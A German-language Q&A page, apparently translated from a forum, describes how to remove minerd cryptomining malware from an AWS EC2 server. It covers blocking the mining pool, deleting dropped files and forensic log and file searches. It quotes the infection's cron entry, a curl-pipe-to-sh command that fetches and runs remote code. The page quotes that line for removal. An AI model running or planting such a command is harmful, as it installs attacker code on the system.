GNU/Linux >> LINUX-Kenntnisse >  >> Linux

Wie kann ich Minerd-Malware auf einer AWS EC2-Instance töten?

Ich habe die Lösung zum Entfernen von minerd gefunden . Ich hatte das Glück, das eigentliche Skript zu finden, das verwendet wurde, um meinen Server zu infizieren. Alles, was ich tun musste, war, die von diesem Skript platzierten Elemente zu entfernen -

  1. Auf Vorschlag von Monkeyoto habe ich die gesamte Kommunikation mit dem Mining-Pool-Server blockiert - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP und iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP .
  2. Cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh entfernt ab /var/spool/cron/root und /var/spool/cron/crontabs/root .
  3. Das Verzeichnis /opt/yam wurde entfernt .
  4. /root/.ssh/KHK75NEOiq entfernt .
  5. Die Dateien /opt/minerd gelöscht und /opt/KHK75NEOiq33 .
  6. Der Minerd-Prozess wurde gestoppt - pkill minerd .
  7. Stopp lady - service lady stop .

Ich habe ps -eo pcpu,args --sort=-%cpu | head ausgeführt , top -bn2 |sed -n '7,25'p und ps aux | grep minerd Danach war die Malware nirgendwo zu sehen.

Ich muss noch herausfinden, wie es Zugriff auf das System erhalten hat, aber ich konnte es auf diese Weise deaktivieren.


Ihr erstes Ziel ist es (wenn Sie nicht neu installieren möchten), festzustellen, wie es überhaupt dorthin gelangt ist. Wenn der Angreifer schlau wäre, würde er "timestomp" ausführen, um die Daten von Binärdateien zu ändern. Das Minimieren von SSH bringt wenig, wenn Sie eine anfällige Version von Wordpress, Joomla oder etwas anderem verwenden. Beispielsweise gab es einen Nagios-Exploit, der von jemandem zum Ausführen von Minerd verwendet wurde. Also das Ziel... "Bestimmen was läuft, warum läuft es und ist es verwundbar?"

Zweitens möchten Sie die gesamte Kommunikation zum und vom Mining-Pool-Server blockieren:

iptables -A INPUT -S xmr.crypto-pool.fr -j DROP

Wie können Sie also feststellen, was modifiziert/geändert/anfällig war? Sie müssen Ihr System verstehen. Was macht es, warum macht es es und wer braucht Zugriff darauf. Ich würde meine Crontabs durchsuchen, um zu sehen, was, wenn irgendetwas beginnt. Sie könnten Folgendes ausführen:service --status-all um zu sehen, welche Dienste laufen/starten, und diese zu untersuchen. /opt/minerd scheint eine Datei zu sein, überprüfen Sie diese Datei und Sie könnten ein Skript erstellen, um nach allem zu suchen, das diese Datei aufruft, oder nach Dateien, die übereinstimmen, z. B.:find / | xargs grep -i minerd oder find / | xargs grep -i CHECKSUM_of_MINERD (Denken Sie daran, dass dies eine brutale Art der Suche in Dateien ist).

Drittens, überprüfen Sie Ihre Protokolle. Wenn Sie einen Webserver betreiben, würde ich mit Fehlerprotokollen (error_logs) beginnen und nach mehreren 403- und 404-Fehlern von einer Adresse suchen, gefolgt von einer erfolgreichen Verbindung in access_log. Überprüfen Sie den akzeptierten Pfad (z. B. 200:/var/www/nagios_or_something_vulnerable/config.php) und schauen Sie in das Verzeichnis. Es gibt viele Ansätze, um diese Informationen zu finden, aber KEINER hier kann Ihnen eine vollständige Antwort geben, da wir Informationen nur basierend auf der begrenzten Menge an Informationen, die Sie posten, ableiten können.

"Ich habe eine Datei namens Minerd am Start!" Suchen Sie nach dieser Datei. (find /|xargs grep -i minerd ). "Es verwendet diese seltsame Saite!" (find / |xargs grep -i 47TS1NQvebb3Feq ). "Es stellt eine Verbindung zu Port 8080 her!" (lsof -i | awk '/8080|http-alt/{print $1"\t"$2"\t"$8"\t"$9}' ). "Es verbindet sich mit dieser Adresse!" (lsof -i | grep xmr.crypto ... Sie haben jetzt eine Grundlinie der Dinge, die Sie tun können.


Das Problem ist, dass der Minerd wahrscheinlich die Nutzlast einer (anderen) Malware ist, sodass Sie nicht wirklich sagen können, was sonst noch auf dem System kompromittiert wurde. Möglicherweise befindet sich nichts anderes auf dem System und Sie werden jedes Mal neu infiziert, wenn Sie den Miner töten.

Alternativ gibt es einen Verwaltungs-/Dropper-Prozess, der eine Hintertür zu Ihrem Server geöffnet hat.

Am sichersten ist es, den Server neu zu erstellen. Aber wenn Sie es scannen möchten, können Sie Sophos Anti-Virus kostenlos von https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx

herunterladen
Linux
  1. Erstellen Sie mit Terraform eine EC2-Instance auf AWS

  2. Wie kann ich xclip auf einer EC2-Instanz installieren?

  3. So installieren Sie jq auf einer Amazon EC2-Instanz

  4. Wie installiere ich PHPMyAdmin auf einer Linux EC2-Instanz?

  5. Wie kann ich Firefox per Konsole beenden?

So verwalten Sie AWS EC2-Instanzen mit aws-cli

So richten Sie eine RDS MySql-Instanz (Relation Database MySql) auf AWS ein

Was ist Terraform und wie wird es auf AWS EC2 installiert und verwendet?

So erstellen Sie eine Amazon AWS EC2-Instanz mit Python Boto3

So erstellen Sie eine Ubuntu EC2-Instance auf AWS

So installieren Sie Rocky Linux 8 auf einer Amazon AWS Ec2-Instanz